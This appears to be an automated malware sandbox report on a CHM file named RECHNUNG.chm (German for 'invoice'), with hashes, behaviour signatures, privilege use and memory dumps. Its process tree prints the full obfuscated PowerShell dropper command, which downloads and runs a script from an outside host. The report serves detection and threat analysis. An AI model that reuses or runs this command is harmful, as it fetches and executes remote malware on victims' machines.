0710eabb964125f65e2ea8587585b1883ce98641ce4da8db46eddc404f8cfa6c

Analysis

max time kernel
112s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
18/10/2022, 21:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RECHNUNG.chm
Size

14KB
MD5

498b61349a8668cae80d468b348abb9d
SHA1

603d0fdba865ad02eef0c96462be6d97d431e7ac
SHA256

e268f2982e14d363e7f7874696d231701234d4b426c3a1bef7271cc0bf766706
SHA512

e4281b3210518e2ea965e5d63a070f2eec89ea1d37b9c0d9d65023ec457570b30ab4092e888e75f53797a33143e5bbcdf8ec2845d3176f8bfae02674e126665f
SSDEEP

192:Nco/1QY0OXlb3iQbZaEaJT5cC+aRWTwY2TZhYj1HhIUb:Ncodln53HZ/aLWa0MY21YIc

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://meyeks.com.tr/hala.txt

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
10	4456	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4456	powershell.exe
4456	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeIncreaseQuotaPrivilege	4456	powershell.exe
Token: SeSecurityPrivilege	4456	powershell.exe
Token: SeTakeOwnershipPrivilege	4456	powershell.exe
Token: SeLoadDriverPrivilege	4456	powershell.exe
Token: SeSystemProfilePrivilege	4456	powershell.exe
Token: SeSystemtimePrivilege	4456	powershell.exe
Token: SeProfSingleProcessPrivilege	4456	powershell.exe
Token: SeIncBasePriorityPrivilege	4456	powershell.exe
Token: SeCreatePagefilePrivilege	4456	powershell.exe
Token: SeBackupPrivilege	4456	powershell.exe
Token: SeRestorePrivilege	4456	powershell.exe
Token: SeShutdownPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeSystemEnvironmentPrivilege	4456	powershell.exe
Token: SeRemoteShutdownPrivilege	4456	powershell.exe
Token: SeUndockPrivilege	4456	powershell.exe
Token: SeManageVolumePrivilege	4456	powershell.exe
Token: 33	4456	powershell.exe
Token: 34	4456	powershell.exe
Token: 35	4456	powershell.exe
Token: 36	4456	powershell.exe
Token: SeIncreaseQuotaPrivilege	4456	powershell.exe
Token: SeSecurityPrivilege	4456	powershell.exe
Token: SeTakeOwnershipPrivilege	4456	powershell.exe
Token: SeLoadDriverPrivilege	4456	powershell.exe
Token: SeSystemProfilePrivilege	4456	powershell.exe
Token: SeSystemtimePrivilege	4456	powershell.exe
Token: SeProfSingleProcessPrivilege	4456	powershell.exe
Token: SeIncBasePriorityPrivilege	4456	powershell.exe
Token: SeCreatePagefilePrivilege	4456	powershell.exe
Token: SeBackupPrivilege	4456	powershell.exe
Token: SeRestorePrivilege	4456	powershell.exe
Token: SeShutdownPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeSystemEnvironmentPrivilege	4456	powershell.exe
Token: SeRemoteShutdownPrivilege	4456	powershell.exe
Token: SeUndockPrivilege	4456	powershell.exe
Token: SeManageVolumePrivilege	4456	powershell.exe
Token: 33	4456	powershell.exe
Token: 34	4456	powershell.exe
Token: 35	4456	powershell.exe
Token: 36	4456	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1732	hh.exe
1732	hh.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 4456	1732	hh.exe	81
PID 1732 wrote to memory of 4456	1732	hh.exe	81

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\RECHNUNG.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://meyeks.com.tr/hala.txt')|P
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4456

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4456-134-0x000001FF66840000-0x000001FF66862000-memory.dmp

Filesize
136KB

Download
memory/4456-135-0x00007FF809890000-0x00007FF80A351000-memory.dmp

Filesize
10.8MB

Download
memory/4456-136-0x00007FF809890000-0x00007FF80A351000-memory.dmp

Filesize
10.8MB

Download